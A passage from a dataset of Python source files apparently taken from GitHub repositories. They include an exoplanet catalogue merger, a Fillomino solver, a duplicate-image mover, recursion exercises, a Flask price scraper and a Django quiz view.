file that do exist in OEC , each directory create a thread to excute merge\n # since the filename in directory is unique so safe to use threading\n for dirOther,dirOec in sameDict.items():\n other = ET.parse(dirOther).getroot()\n tree = ET.parse(dirOec)\n oec = tree.getroot()\n first = -1 # use to control return statement in merge recursion call\n move = False # use to decide whehter a file should move\n # create threading excute merge function\n t = threading.Thread(target=merge, args = (other, oec, dirOther,dirOec,tree,first,move,))\n t.daemon = True # set thread to daemon ('ok' won't be printed in this case)\n t.start()\n t.join()\n\n\ndef run_merge():\n list_xmldir_nasa = glob.glob(\"_data/Nasa/*.xml\")\n list_xmldir_eu = glob.glob(\"_data/EU/*.xml\")\n list_xmldir_oec = glob.glob(\"_data/OEC/*.xml\")\n\n print(\"nasa before merge size is :\" + str(len(list_xmldir_nasa)), flush=True)\n print(\"eu before size merge is :\" + str(len(list_xmldir_eu)), flush=True)\n print(\"oec before size merge is :\" + str(len(list_xmldir_oec)), flush=True)\n\n print(\"start merging....\", flush=True)\n try:\n merge_two_database(list_xmldir_nasa, list_xmldir_oec)\n merge_two_database(list_xmldir_eu, list_xmldir_oec)\n except:\n pass\n print('merge done', flush=True)\n\n list_xmldir_nasa = glob.glob(\"_data/Nasa/*.xml\")\n list_xmldir_eu = glob.glob(\"_data/EU/*.xml\")\n list_xmldir_oec = glob.glob(\"_data/OEC/*.xml\")\n\n print(\"nasa after merge size is :\" + str(len(list_xmldir_nasa)), flush=True)\n print(\"eu after merge size is :\" + str(len(list_xmldir_eu)), flush=True)\n print(\"oec after merge size is :\" + str(len(list_xmldir_oec)), flush=True)\n\n\ndef download_database(db):\n if db == \"nasa\":\n print('Start downloading Nasa', flush=True)\n nasa.get()\n nasa.parse()\n print('Nasa done', flush=True)\n elif db == \"eu\":\n print('Start downloading EU', flush=True)\n eu.get()\n eu.parse()\n print(\"EU done\", flush=True)\n elif db == \"oec\":\n print('Start downloading OEC', flush=True)\n oec.get()\n oec.parse()\n print('OEC done', flush=True)\n\n\ndef main():\n start_time = time.time()\n\n download_list = [\"nasa\", \"eu\", \"oec\"]\n pool = multiprocessing.Pool(processes=3)\n pool.map(download_database, download_list)\n pool.close()\n print(\"Download complete.\", flush=True)\n xmltools.ensure_empty_dir(\"_data/push\")\n xmltools.ensure_empty_dir(\"_data/OEC_old\")\n file_list = glob.glob(\"_data/OEC/*.xml\")\n for next_file in file_list:\n shutil.copy2(next_file, \"_data/OEC_old/\")\n\n run_merge()\n print(\"--- %s seconds ---\" % (time.time() - start_time), flush=True)\n\n\ndef check_difference():\n list_xmldir_oec = glob.glob(\"_data/OEC/*.xml\")\n result = []\n for next_file in list_xmldir_oec:\n try:\n file_old = open(next_file.replace(\"_data/OEC/\", \"_data/OEC_old/\"), encoding=\"utf8\")\n file_new = open(next_file, encoding=\"utf8\")\n if file_old.read() != file_new.read():\n result.append((next_file, \"Modified\"))\n file_old.close()\n file_new.close()\n\n except FileNotFoundError:\n result.append((next_file, \"Added\"))\n return result\n\n\ndef accept(file):\n shutil.copy2(file, \"_data/accepted/\")\n\n\ndef create_pull_request(token):\n push_list = glob.glob(\"_data/accepted/*.xml\")\n updated_list = []\n\n def process_push(next_file, destination):\n file = open(next_file, encoding=\"utf8\")\n content = file.read()\n try:\n github.push_file(destination, \"Update \" + next_file.split(\"/\")[-1], content, token)\n except IndexError:\n pass\n else:\n updated_list.append(next_file.split(\"/\")[-1])\n file.close()\n\n for next_xml in push_list:\n process_push(next_xml, \"systems/\" + next_xml.split(\"/\")[-1])\n\n print(\"\\nDone.\", flush=True)\n\n print(\"Creating pull request... \", end=\"\", flush=True)\n try:\n pr = github.create_pull_request(\"[ONE Syncr] Update exoplanet systems\", token)\n pr_number = \"/\" + str(pr.number)\n except github.github3.models.GitHubError:\n pr_number = \"s/\"\n print(\"Pull request already exists.\", flush=True)\n else:\n print(\"Done.\", flush=True)\n\n pr_url = \"https://github.com/\" + github.TARGET_USERNAME + \"/open_exoplanet_catalogue/pull\" + pr_number\n return pr_url\n\n\ndef send_email(token, updated_list, pr_url):\n gh = login(token=token)\n user = gh.user()\n\n if user.email:\n print(\"Sending notification email... \", end=\"\", flush=True)\n\n email_receiver = user.name + \" <\" + user.email + \">\"\n body = \"Hi there,\\n\\nThe following files were updated:\\n\\n\"\n for next_file in updated_list:\n body += \"\\t\" + next_file + \"\\n\"\n\n body += \"\\nA pull request has been created: \" + pr_url + \"\\n\"\n mail.send_email(mail.EMAIL_SENDER,\n email_receiver,\n \"Update to Open Exoplanet Catelogue\",\n body)\n print(\"An email was sent to \" + email_receiver, flush=True)\n else:\n print(\"Public email not set on GitHub.\", flush=True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"A-Kun/onesyncr-for-oec","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7932445874","text":"\"\"\"Модуль находит решение заданного поля и выбрасиывает исключение,\nесли решения не существует\"\"\"\n\nimport argparse\nimport classes\nimport copy\nimport pickle\nimport queue\nimport sys\nfrom multiprocessing import Pool\n\n\ndef solve(field_to_solve):\n \"\"\"Метод находит решение\"\"\"\n if field_to_solve.cells_with_number is None or field_to_solve.areas:\n raise ValueError\n cells_without_numbers = select_cells_zones_without_numbers(field_to_solve)\n with Pool(5) as p:\n for area in cells_without_numbers:\n a = p.apply_async(task_for_worker,\n args=(field_to_solve, area,\n max(field_to_solve\n .cells_with_number.values()) +\n 1)).get()\n if a is None:\n print(area)\n for c in a.cells:\n field_to_solve.cells[c.layer][c.place] = c\n total_areas = select_areas(field_to_solve)\n if total_areas is None:\n raise ValueError(\"We can't solve\")\n field_to_solve.set_areas(total_areas)\n return field_to_solve\n\n\ndef task_for_worker(f, area, n):\n for figure in get_next_figure(area, set(), 0, n):\n areas = select_areas(f)\n if areas is not None:\n return figure\n\n\ndef select_cells_zones_without_numbers(f: classes.Field):\n \"\"\"Метод возвращает все связные области пустых клеток в порядке \n возрастания размеров области\"\"\"\n cells_without_number = []\n visited = set()\n n = f.n\n for i in range(n):\n for j in range(i * 2 + 1):\n cell = f.cells[i][j]\n if cell.number == 0 and cell not in visited:\n cells_without_number.append(select_area(visited, f, cell))\n cells_without_number_sorted = sorted(cells_without_number,\n key=lambda area: len(area),\n reverse=True)\n return cells_without_number_sorted\n\n\ndef check_if_ok(areas, cells_with_number, figure):\n \"\"\"Метод проверяет не конфликтует ли зона figure\n с другими уже установленными зонами\"\"\"\n for area in areas:\n cells = set(area.cells)\n for cell in figure:\n if cell in cells:\n return False\n count = 0\n for cell in figure:\n if cell in cells_with_number:\n count += 1\n if count == 0:\n return False\n return True\n\n\ndef select_areas(f):\n \"\"\"Метод выделяет зоны на поле, если это возможно\"\"\"\n n = f.n\n areas = []\n visited_cells = set()\n for i in range(n):\n for j in range(i * 2 + 1):\n cell = f.cells[i][j]\n if cell in visited_cells:\n continue\n visited_cells.add(cell)\n if cell.number == 0:\n continue\n number = cell.number\n current_area = classes.Area()\n empty_neibs = 0\n current_area.add_cell(cell)\n open_area = True\n index = 0\n while open_area and index < len(current_area.cells):\n x = current_area.cells[index].layer\n y = current_area.cells[index].place\n index += 1\n open_area = False\n for di, dj in classes.direction_dictionary.values():\n if (x + di < 0 or x + di >= n or\n y + dj < 0 or y + dj >= 2 * (x + di) + 1):\n continue\n new_cell = f.cells[x + di][y + dj]\n if new_cell in visited_cells:\n continue\n if new_cell.number == 0:\n empty_neibs += 1\n if new_cell.number == number:\n current_area.add_cell(new_cell)\n visited_cells.add(new_cell)\n open_area = True\n if ((len(current_area) == number or\n empty_neibs > 0 and\n len(current_area) + empty_neibs <= number) and\n check_if_ok(areas, set(f.cells_with_number.keys()),\n current_area.cells)):\n areas.append(current_area)\n else:\n return None\n return areas\n\n\ndef select_area(visited, f, cell):\n \"\"\"Метод выбирает связную область пустых клеток\"\"\"\n area = classes.Area()\n n = f.n\n area.add_cell(cell)\n cells_for_check = queue.Queue()\n cells_for_check.put(cell)\n visited.add(cell)\n while not cells_for_check.empty():\n c = cells_for_check.get()\n x = c.layer\n y = c.place\n for di, dj in classes.direction_dictionary.values():\n if (x + di < 0 or x + di >= n or\n y + dj < 0 or y + dj >= 2 * (x + di) + 1):\n continue\n new_cell = f.cells[x + di][y + dj]\n if new_cell in visited:\n continue\n if new_cell.number == 0:\n area.add_cell(new_cell)\n visited.add(new_cell)\n cells_for_check.put(new_cell)\n return area\n\n\ndef get_next_figure(area, cells_with_number, x, n):\n \"\"\"Метод расставляет цифры в пустых клетках\"\"\"\n if len(area) <= x:\n yield area\n elif area.cells[x] in cells_with_number:\n yield from get_next_figure(area, cells_with_number, x + 1, n)\n else:\n cell = area.cells[x]\n cells_with_number.add(cell)\n for index in range(1, n):\n cell.set_number(index)\n yield from get_next_figure(area,\n copy.deepcopy(cells_with_number), \n x + 1, n)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='''Находит решение\n заданного поля и выбрасиывает исключение, если решения не существует,\n на вход принимает головоломку''')\n field = pickle.loads(sys.stdin.read().encode())\n sys.stdout.buffer.write(pickle.dumps(solve(field), 0))\n","repo_name":"Mefoolyhi/Fillomino","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9115693546","text":"import os,sys,hashlib,glob,logging.handlers,shutil,time,configparser\n\ndef get_dirname(string):\n return os.path.dirname(string)\n\ndef init_log(logfile):\n logging.basicConfig(filename=logfile,level=logging.DEBUG, encoding=\"utf-8\")\n\ndef write_log(msg):\n timestr = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))\n logmsg = \"%s\\t%s\" % (timestr , msg)\n print(logmsg)\n logging.info(logmsg)\n\ndef sumfile(fobj): \n m = hashlib.md5()\n while True:\n d = fobj.read(8096)\n if not d:\n break\n m.update(d)\n return m.hexdigest()\n\n#get md5sum of file\ndef md5sum(fname): \n if fname == '-':\n ret = sumfile(sys.stdin)\n else:\n #try:\n f = open(fname, 'rb')\n #except:\n #write_log(\"FATAL: Failed to open file [%s]\" % fname)\n ret = sumfile(f)+\"-\"+str(os.path.getsize(fname))\n f.close()\n return ret\n\n#load garbage dict\ndef load_garbage_dict(dirname, garbage_dict):\n for item in os.listdir(dirname):\n subpath = os.path.join(dirname, item)\n if os.path.isdir(subpath):\n load_garbage_dict(subpath, garbage_dict)\n elif os.path.isfile(subpath):\n md5value=md5sum(subpath)\n garbage_dict[md5value]=subpath\n write_log(\"md5value[%s]\\tfile[%s]\" %(md5value, subpath))\n\n#get md5sum of msg\ndef md5sum_msg(msg):\n m = hashlib.md5()\n m.update(msg.encode())\n return m.hexdigest()\n\n#get md5sum for dir message(files' name and length, exclude html and txt)\ndef gen_dir_md5sum(dirname):\n dir_msg=\"\"\n for item in os.listdir(dirname):\n subpath = os.path.join(dirname, item)\n if os.path.isfile(subpath):\n subfix = os.path.splitext(subpath)[1][1:].lower()\n if subfix == \"html\" or subfix==\"txt\" or subfix==\"db\" or subfix==\"torrent\":\n continue\n dir_msg+=(\"%s\\t%d\\t\" % (item, os.path.getsize(subpath)))\n return md5sum_msg(dir_msg)\n\n#build the digest for dir\ndef build_dir_msg(dirname, subpath, dirsum):\n fp=open(subpath, \"w\", encoding=\"utf-8\")\n fp.write(\"%s\\n\" % dirsum)\n for item in os.listdir(dirname):\n subpath = os.path.join(dirname, item)\n if os.path.isfile(subpath):\n subfix = os.path.splitext(subpath)[1][1:].lower()\n if subfix == \"html\" or subfix==\"txt\" or subfix==\"db\" or subfix==\"torrent\":\n continue\n md5value=md5sum(subpath)\n #print(subpath)\n fp.write(\"%s\\t%s\\n\" % (item, md5value))\n fp.write(\"END\\n\")\n fp.close()\n\n#check if digest for dir changes, include files'name file's length\ndef if_dir_change(subpath, dirsum):\n fp=open(subpath, \"r\", encoding=\"utf-8\")\n line_list=fp.readlines()\n fp.close()\n line_num=len(line_list)\n if line_num < 2:\n write_log(\"FATAL\\tdirsum file[%s] format error\" % subpath)\n return True\n if line_num > 0:\n if line_list[0].replace(\"\\n\",\"\") != dirsum:\n write_log(\"dirsum file[%s] changed, rebuild it\" % subpath)\n return True\n elif line_list[line_num-1].replace(\"\\n\",\"\") != \"END\":\n write_log(\"dirsum file[%s] no END, rebuild it\" % subpath)\n return True\n else:\n write_log(\"dirsum file[%s] no line, rebuild it\" % subpath)\n return True\n\n#read the digest file for dir to append to file list\ndef read_filelist(subpath, filelist):\n dirname=get_dirname(subpath)\n fp=open(subpath, \"r\", encoding=\"utf-8\")\n line_list=fp.readlines()\n fp.close()\n line_num=len(line_list)\n if line_num < 2:\n write_log(\"FATAL\\tdirsum file[%s] format error\" % subpath)\n return\n for i in range(1,line_num-1):\n line_array=line_list[i].replace(\"\\n\",\"\").split(\"\\t\")\n if len(line_array) !=2:\n write_log(\"FATAL\\tdirsum file[%s] line%d[%s] format error\" % (subpath, i, line_list[i]))\n continue\n fname=os.path.join(dirname, line_array[0])\n md5value=line_array[1]\n filelist.append([fname, md5value])\n\n#calculate the total valid file(exclude en and txt) number\ndef total_dir(dirname):\n number=0\n for item in os.listdir(dirname):\n subpath = os.path.join(dirname, item)\n try:\n if os.path.isdir(subpath):\n number+=total_dir(subpath)\n elif os.path.isfile(subpath):\n subfix = os.path.splitext(subpath)[1][1:].lower()\n \n if subfix == \"html\" or subfix==\"txt\" or subfix==\"db\" or subfix==\"torrent\":\n continue\n number+=1\n except Exception as ex:\n continue\n return number\n\n#check dir recursive\ndef check_dir(dirname, filelist,totalnum):\n if_has_son_dir=False\n #print(dirname)\n #try:\n if True:\n for item in os.listdir(dirname):\n subpath = os.path.join(dirname, item)\n #print(subpath)\n if os.path.isdir(subpath):\n if_has_son_dir=True\n #print(if_has_son_dir)\n check_dir(subpath, filelist, totalnum)\n #print(if_has_son_dir)\n #if not if_has_son_dir:\n if True:\n dirsum=gen_dir_md5sum(dirname)\n subpath = os.path.join(dirname, \"dirsum.txt\")\n print(subpath)\n if not os.path.exists(subpath):\n print(subpath)\n write_log(\"dirsum file[%s] not exist, create it\" % subpath)\n build_dir_msg(dirname, subpath, dirsum)\n elif if_dir_change(subpath, dirsum): \n build_dir_msg(dirname, subpath, dirsum)\n read_filelist(subpath, filelist)\n write_log(\"total: %d\\tcurrent: %d\" % (totalnum, len(filelist)))\n #except Exception as ex:\n # pass\n #print(dirname)\n\n#mv file to dst dir\ndef mv_file(src_dir, dst_dir, oldpic, similarpic):\n newpic = dst_dir+oldpic[len(src_dir):]\n if not os.path.exists(oldpic):\n write_log(\"FATAL: file [%s] not exist!\" % oldpic)\n return\n newdir=get_dirname(newpic)\n try:\n if not os.path.exists(newdir):\n os.makedirs(newdir)\n except Exception as ex:\n pass\n try:\n shutil.move(oldpic, newpic)\n except Exception as ex:\n pass\n write_log(\"move\\n%s\\nto\\n%s\\nsimilar to\\n%s\\n######################################\" % (oldpic, newpic, similarpic))\n\ndef del_repeat_and_garbage(root_dir, file_list, garbage_dict, garbage_dir, repeatfile_dir, dir_dict):\n #record the change directory, for recreate dirsum for these directorys\n change_dir_dict={}\n total_file_num=len(file_list)\n for i in range(total_file_num):\n if i % 10000 == 0:\n write_log(\"del_repeat_and_garbage total: %d\\tcurrent: %d\" %(total_file_num, i))\n #file name\n fname=file_list[i][0]\n #directory name\n dname=get_dirname(fname)\n #if dirname not in dir dict, then build a file dict insert into dir_dict\n if dname not in dir_dict:\n file_dict={}\n dir_dict[dname]=file_dict\n #file md5 value\n md5value=file_list[i][1]\n #if file is a garbage\n if md5value in garbage_dict:\n change_dir_dict[dname]=0\n mv_file(root_dir, garbage_dir, fname, garbage_dict[md5value])\n #if file in file dict\n elif md5value in dir_dict[dname]:\n change_dir_dict[dname]=0\n mv_file(root_dir, repeatfile_dir, fname, dir_dict[dname][md5value])\n #insert into dir dict\n else:\n dir_dict[dname][md5value]=fname\n #walk on all the change directorys, to recreate dirsum\n total_dir_num=len(change_dir_dict)\n x=0\n for dirname in change_dir_dict:\n if x % 10 == 0:\n write_log(\"rebuild_dirsum total: %d\\tcurrent: %d\" %(total_dir_num, x))\n x+=1\n dirsum=gen_dir_md5sum(dirname)\n subpath = os.path.join(dirname, \"dirsum.txt\")\n if not os.path.exists(subpath):\n write_log(\"dirsum file[%s] not exist, create it\" % subpath)\n build_dir_msg(dirname, subpath, dirsum)\n elif if_dir_change(subpath, dirsum):\n build_dir_msg(dirname, subpath, dirsum)\n\n#output the filelist and md5values to result file\ndef output_dir2(dir_dict, result_file):\n fi= open(result_file, \"w\", encoding=\"utf-8\")\n for d in dir_dict:\n for md5value in dir_dict[d]:\n fi.write(\"%s\\t%s\\n\" % (dir_dict[d][md5value], md5value))\n fi.close()\n\ndef get_md5value():\n g_garbage_dict={}\n g_file_list=[]\n g_dir_dict={}\n cf = configparser.ConfigParser()\n cf.read(\"config.conf\")\n g_log_file=cf.get(\"del_reapeat\", \"LOG_FILE\")\n init_log(g_log_file)\n write_log(\"PROGRAM BEGIN\")\n g_garbage_dir=cf.get(\"del_reapeat\",\"GARBAGE_FILES_DIR\")\n g_target_dir=cf.get(\"global\", \"TARGET_DIR\")\n g_result_file=cf.get(\"del_reapeat\", \"MD5VALUE_RESULT\")\n timestr = time.strftime('%Y%m%d-%H%M',time.localtime(time.time()))\n g_garbage_res_dir=os.path.join(get_dirname(g_target_dir), \"garbagefile_%s\\\\\" % timestr)\n g_repeatfile_res_dir=os.path.join(get_dirname(g_target_dir), \"repeatfile_%s\\\\\" % timestr)\n g_target_dir+=\"\\\\\"\n g_target_dir = g_target_dir\n g_garbage_dir = g_garbage_dir\n g_garbage_res_dir = (g_garbage_res_dir)\n g_repeatfile_res_dir = (g_repeatfile_res_dir)\n g_result_file = (g_result_file)\n write_log(\"garbage dir: %s\" % g_garbage_dir)\n write_log(\"target dir: %s\" % g_target_dir)\n write_log(\"md5value result file: %s\" % g_result_file)\n write_log(\"load_garbage_dict...\")\n load_garbage_dict(g_garbage_dir, g_garbage_dict)\n write_log(\"load_garbage_dict end\")\n write_log(\"total garbage files: %d\" % len(g_garbage_dict))\n write_log(\"total_dir...\")\n #x = raw_input(\"total picture number:\\n\")\n #if x==\"\":\n # g_totalnum=total_dir(g_target_dir)\n #else:\n # g_totalnum=int(x)\n g_totalnum=total_dir(g_target_dir)\n write_log(\"total_dir end\")\n write_log(\"total_number:%d\" % g_totalnum)\n write_log(\"check_dir...\")\n check_dir(g_target_dir, g_file_list, g_totalnum)\n write_log(\"check_dir end\")\n write_log(\"del_repeat_and_garbage...\")\n del_repeat_and_garbage(g_target_dir, g_file_list, g_garbage_dict, g_garbage_res_dir, g_repeatfile_res_dir, g_dir_dict)\n write_log(\"del_repeat_and_garbage end\")\n write_log(\"output_dir...\")\n output_dir2(g_dir_dict, g_result_file)\n write_log(\"output_dir end\")\n write_log(\"PROGRAM END\")\n\ndef load_md5value_file(input_file, dir_dict, pic_dict):\n fp=open(input_file, \"r\", encoding=\"utf-8\")\n picno=0\n for line in fp.readlines():\n line_array=line.split(\"\\t\")\n filename=line_array[0]\n md5value=line_array[1].replace(\"\\n\",\"\")\n dirname=get_dirname(filename)\n #print filename\n #print md5value\n #print dirname\n if (dirname not in dir_dict):\n #if not os.path.isdir(dirname):\n # write_log(\"FATAL\\tfile[%s]'s path[%s] is not a directory\" % (filename, dirname))\n # continue\n subdir_dict={}\n subdir_dict[filename]=md5value\n dir_dict[dirname]=subdir_dict\n else:\n dir_dict[dirname][filename]=md5value\n\n if (md5value not in pic_dict):\n dirs_dict={}\n dirs_dict[dirname]= 1\n pic_dict[md5value]=dirs_dict\n else:\n pic_dict[md5value][dirname]=1\n picno+=1\n write_log(\"total input pictures: %d\" % picno)\n\ndef get_father(dir_dict, pic_dict, father_dict, target_dir):\n for d in dir_dict:\n if target_dir != d[:len(target_dir)]:\n continue\n temp_dict={}\n #walk on all the files of folder d to build the dict for the union of all the files' folders\n for f in dir_dict[d]:\n for x in pic_dict[dir_dict[d][f]]:\n if x not in temp_dict:\n temp_dict[x] = 1\n else:\n temp_dict[x]= temp_dict[x] + 1\n #walk on temp_dict to build son and father relation\n for item in temp_dict:\n i = item\n #get d's father and make ture d's father is not itself\n if (temp_dict[i] == len(dir_dict[d])) and (d != i):\n #if i's father already is d, then don't mark d's father be i\n if (i in father_dict) and (father_dict[i] == d):\n write_log(\"brothers\\t%s\\t%s\" % (d, i))\n continue\n write_log(\"get_father\\t%s\\t%s\" % (d, i))\n #if i has father and not be d, then mark i be i's father\n if (i in father_dict):\n write_log(\"rep_grandpa\\t%s\\t%s\" % (i, father_dict[i]))\n i=father_dict[i]\n #replace the father of d's son\n for y in father_dict:\n if father_dict[y] == d:\n father_dict[y]=i\n write_log(\"rep_father\\t%s\\tfather\\tfrom\\t%s\\tto\\t%s\" % (y, d, i))\n #replace the father of d\n father_dict[d]=i\n break\n temp_dict.clear()\n\ndef output_relation(father_dict, output_file):\n fi= open(output_file, \"w\", encoding=\"utf-8\")\n for d in father_dict:\n fi.write(\"%s\\t%s\\n\" % (d, father_dict[d]))\n fi.close()\n\n#output the filelist and md5values to result file\ndef output_dir3(dir_dict, father_dict, result_file):\n fi= open(result_file, \"w\", encoding=\"utf-8\")\n picno=0\n for d in dir_dict:\n if d not in father_dict:\n for f in dir_dict[d]:\n picno+=1\n fi.write(\"%s\\t%s\\n\" % (f, dir_dict[d][f]))\n fi.close()\n write_log(\"total output pictures: %d\" % picno)\n\ndef get_father_relation():\n g_dir_dict={}\n g_pic_dict={}\n g_father_dict={}\n cf = configparser.ConfigParser()\n cf.read(\"config.conf\")\n g_log_file=cf.get(\"del_reapeat\", \"LOG_FILE\")\n init_log(g_log_file)\n write_log(\"PROGRAM BEGIN\")\n g_target_dir=cf.get(\"global\", \"TARGET_DIR\")\n g_input_file_base=cf.get(\"del_reapeat\", \"BASE_MD5VALUE_RESULT\")\n g_input_file=cf.get(\"del_reapeat\", \"MD5VALUE_RESULT\")\n g_output_file=cf.get(\"del_reapeat\", \"FATHER_RELATION\")\n g_target_dir+=\"\\\\\"\n g_target_dir = (g_target_dir)\n g_input_file = (g_input_file)\n g_output_file = (g_output_file)\n write_log(\"md5value result: %s\" % g_input_file)\n write_log(\"father relation: %s\" % g_output_file)\n write_log(\"load_md5value_file...\")\n load_md5value_file(g_input_file, g_dir_dict, g_pic_dict)\n write_log(\"load_md5value_file end\")\n if os.path.exists(g_input_file_base):\n write_log(\"load_md5value_base_file...\")\n load_md5value_file(g_input_file_base, g_dir_dict, g_pic_dict)\n write_log(\"load_md5value_base_file end\")\n write_log(\"get_father...\")\n get_father(g_dir_dict, g_pic_dict, g_father_dict, g_target_dir)\n write_log(\"get_father end\")\n write_log(\"output_relation...\")\n output_relation(g_father_dict, g_output_file)\n write_log(\"output_relation end\")\n write_log(\"output_dir...\")\n output_dir3(g_dir_dict, g_father_dict, g_input_file+\"_new.txt\")\n write_log(\"output_dir end\")\n write_log(\"PROGRAM END\")\n\ndef disposal_file(input_file, father_dict):\n fp=open(input_file, \"r\", encoding=\"utf-8\")\n for line in fp.readlines():\n line_array=line.split(\"\\t\")\n sonname=line_array[0]\n fathername=line_array[1].replace(\"\\n\",\"\")\n father_dict[sonname]=fathername\n\ndef mv_dir(src_dir, dst_dir, father_dict):\n for olddir in father_dict:\n has_son_dir = False\n for item in os.listdir(olddir):\n subpath = os.path.join(olddir, item)\n if os.path.isdir(subpath):\n has_son_dir = True\n break\n #if has_son_dir:\n # continue\n newdir = dst_dir+olddir[len(src_dir):]\n if not os.path.exists(newdir):\n #write_log(\"makedir[%s]\" % newdir)\n try:\n os.makedirs(newdir)\n except Exception as ex:\n pass\n for item in os.listdir(olddir):\n oldpath=os.path.join(olddir,item)\n if os.path.isdir(oldpath):\n continue\n newpath=os.path.join(newdir,item)\n #write_log(\"src[%s] dst[%s]\" % (oldpath, newpath))\n try:\n shutil.move(oldpath, newpath)\n except Exception as ex:\n pass\n if not has_son_dir and len(os.listdir(olddir))==0:\n os.rmdir(olddir)\n write_log(\"final_father src\\n%s\\n new\\n%s\\n father\\n%s\\n######################################\" % (olddir, newdir, father_dict[olddir]))\n\ndef mv_repeat():\n g_father_dict={}\n cf = configparser.ConfigParser()\n cf.read(\"config.conf\")\n g_log_file=cf.get(\"del_reapeat\", \"LOG_FILE\")\n init_log(g_log_file)\n write_log(\"PROGRAM BEGIN\")\n g_target_dir=cf.get(\"global\", \"TARGET_DIR\")\n g_input_file=cf.get(\"del_reapeat\", \"FATHER_RELATION\")\n timestr = time.strftime('%Y%m%d-%H%M',time.localtime(time.time()))\n g_result_dir=os.path.join(os.path.dirname(g_target_dir), \"repeatdir_%s\\\\\" % timestr)\n g_target_dir+=\"\\\\\"\n g_target_dir = (g_target_dir)\n g_result_dir = (g_result_dir)\n g_input_file = (g_input_file)\n write_log(\"father relation file: %s\" % g_input_file)\n write_log(\"target dir: %s\" % g_target_dir)\n write_log(\"result dir: %s\" % g_result_dir)\n write_log(\"disposal_file...\")\n disposal_file(g_input_file, g_father_dict)\n write_log(\"disposal_file end\")\n write_log(\"mv_dir...\")\n mv_dir(g_target_dir, g_result_dir, g_father_dict)\n write_log(\"mv dir end\")\n write_log(\"PROGRAM END\")\n\nget_md5value()\nget_father_relation()\nmv_repeat()\n","repo_name":"yangkai04/picture_disposal","sub_path":"del_repeat.py","file_name":"del_repeat.py","file_ext":"py","file_size_in_byte":17679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30893868921","text":"def sumarRecursivamente(numeroASumarRecursivamente):\n if numeroASumarRecursivamente <=0:\n return 0\n \n return numeroASumarRecursivamente + sumarRecursivamente(numeroASumarRecursivamente-1)\n\ndef factorialRecursivo(numeroABuscarFactorial):\n if numeroABuscarFactorial == 0:\n return 1\n \n return numeroABuscarFactorial * factorialRecursivo(numeroABuscarFactorial-1)\n\n\ndef potenciaRecursiva(numeroAPotenciar, potenciaDeseada):\n if potenciaDeseada == 0:\n return 1\n \n return numeroAPotenciar * potenciaRecursiva(numeroAPotenciar,potenciaDeseada-1)\n\n\nif __name__ == '__main__':\n while True:\n print(''' \n \n Opciones del Menu \n \n S[U]ma Recursiva\n [P]otencia\n [F]actorial\n [S]alir\n ''')\n \n comando = input ('Digite la opcion deseada: ').lower()\n try:\n if comando == 'u':\n numeroASumarRecursivamente = int(input('Ingrese el Numero Entero a Sumar Recurivamente: ')) \n resultadoSumaRecursiva = sumarRecursivamente(numeroASumarRecursivamente)\n print('La suma recursiva del numero {} es: {}'.format(numeroASumarRecursivamente,resultadoSumaRecursiva))\n elif comando == 'p':\n datosSolicitadosParaLaPotencia = input('Ingrese el Numero y su Potencia separados por \",\": ')\n listaParametros = datosSolicitadosParaLaPotencia.split(\",\")\n resultadoPotencia = potenciaRecursiva(int(listaParametros[0]),int(listaParametros[1]))\n print('La potencia del numero {} a la {} es: {}'.format(listaParametros[0],listaParametros[1],resultadoPotencia))\n elif comando == 'f':\n numeroABuscarFactorial = int(input('Ingrese el Numero Entero que desee buscar su Factorial: '))\n resultadoFactorial = factorialRecursivo(numeroABuscarFactorial)\n print('El factorial del numero {} es: {}'.format(numeroABuscarFactorial,resultadoFactorial))\n\n elif comando == 's':\n break\n except ValueError:\n print(\"Ingreso Invalido, por favor digite un numero Entero positivo\")\n \n\n \n","repo_name":"jrperez175/Python","sub_path":"Recursividad/recursividadAplicada.py","file_name":"recursividadAplicada.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21032162138","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/price\", methods=[\"GET\", \"POST\"])\ndef get_product_price():\n data = request.get_json()\n product_url = data.get(\"url\")\n\n if product_url:\n price = scrape_product_price(product_url)\n return jsonify({\"price\": price})\n else:\n return jsonify({\"error\": \"Invalid request\"}), 400\n\n\ndef scrape_product_price(product_url):\n response = requests.get(product_url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n detail_container = soup.find(\"div\", id=\"detail-container\")\n google_product_data = detail_container.get(\"data-googleproduct\", {})\n product_price = \"\"\n if google_product_data:\n product_data = json.loads(google_product_data)\n product_price = product_data.get(\"price\", \"\")\n\n return product_price\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"cheunyinz/react-dashboard","sub_path":"crawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74966440856","text":"from django.views.generic import ListView\n\nfrom cultures.models import Culture\n\nfrom quizzes.models import Question, Answer\n\n\nclass QuizView(ListView):\n\n model = Question\n context_object_name = 'questions'\n template_name = 'quiz.html'\n\n def get_queryset(self):\n questions = Question.objects.filter(\n culture=Culture.objects.get(name__icontains=self.kwargs['name'])\n )\n return questions\n\n def get_context_data(self, **kwargs):\n context = super(QuizView, self).get_context_data(**kwargs)\n questions = self.get_queryset()\n answers = []\n for q in questions:\n a = Answer.objects.filter(question=q.pk)\n answers.append(a)\n context['answers'] = answers\n print(context)\n return context\n","repo_name":"juanpflores/Hodor","sub_path":"quizzes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23158521056","text":"# #with open(\"./weather_data.csv\") as weather_data:\n# # data=weather_data.readlines()\n# # 